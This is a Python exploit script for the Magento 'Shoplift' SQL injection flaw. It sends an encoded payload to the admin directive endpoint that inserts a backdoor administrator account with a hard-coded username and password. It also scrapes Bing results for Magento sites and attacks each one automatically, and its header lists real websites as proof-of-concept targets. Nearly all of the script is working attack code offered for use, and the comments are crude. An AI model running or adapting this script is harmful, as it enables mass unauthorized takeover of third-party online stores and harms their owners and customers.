#!/usr/bin/python
\'\'\'
POC Sites:
www.anandindia.in
goyalglassware.com
ishopping.pk
value.pk
References:
http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/
\'\'\'
try:
from urlparse import urlsplit
import requests, base64, sys, re, os
except:
exit("\\n\\n[-] Import Error !\\n")
def Exploit(url):
final_url = "http://" + url + "/admin/Cms_Wysiwyg/directive/index/"
q = """
SET @SALT = \'rp\';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , \'{password}\') ), CONCAT(\':\', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES (\'Firstname\',\'Lastname\',\'email@example.com\',\'{username}\',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,\'U\',(SELECT user_id FROM admin_user WHERE username = \'{username}\'),\'Firstname\');
"""
query = q.replace("\\n", "").format(username="stoker", password="secret")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
r = requests.post(final_url,
data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
"filter": base64.b64encode(pfilter),
"forwarded": 1})
if r.ok:
print "\\n -- > [{0}/admin] Credentials: [\'stoker\' : \'secret\']".format(url)
else:
print " [-] {0} Not Vulnerable".format(url)
def main():
# Change Dork in Bing URL if u need to modify it !
# Google Will also Work Same, infact more better if you use
# inurl:js/magentothem/
# dork, but it\'ll ask you to enter captcha after multiple requests from the same ip
# i\'m too lazy to play with that, so i gone ahead with bing.
# Bing\'s instreamUrl:Title:URL is not gonna work Here !
response = requests.get(\'http://www.bing.com/search?q=Powered+by+Magento+site%3Apk\')
URLs = re.findall(r\'href=[\\\'"]?([^\\\'" >]+)\', response.content) # Old Friend :P
URLS_LIST = [] # Container for Bitches !
for url in URLs:
baseUrl = urlsplit(url).netloc # meet your requirements ;)
if len(baseUrl) != 0: # Cheaters Not Allowed !
URLS_LIST.append(baseUrl) # Load Bitches
for uri in set(URLS_LIST):
Exploit(uri) # Bang Bang Bang
if __name__ == \'__main__\':
os.system(\'cls\')
try:
print \'\'\'\\n
-------------------------------------------------
Title: Magento Auth Exploit !
Author: Muhammad Adeel
Mail: Chaudhary1337@gmail.com
Blog: http://urdusecurity.blogspot.com
-------------------------------------------------\\n\\n
\'\'\'
main()
except:
exit("\\nErrrrrrrrrrrrrrrrroooooooooooooooooooooorrrrrrrrrrrrrrrrrrrrrrrrrrr !!!")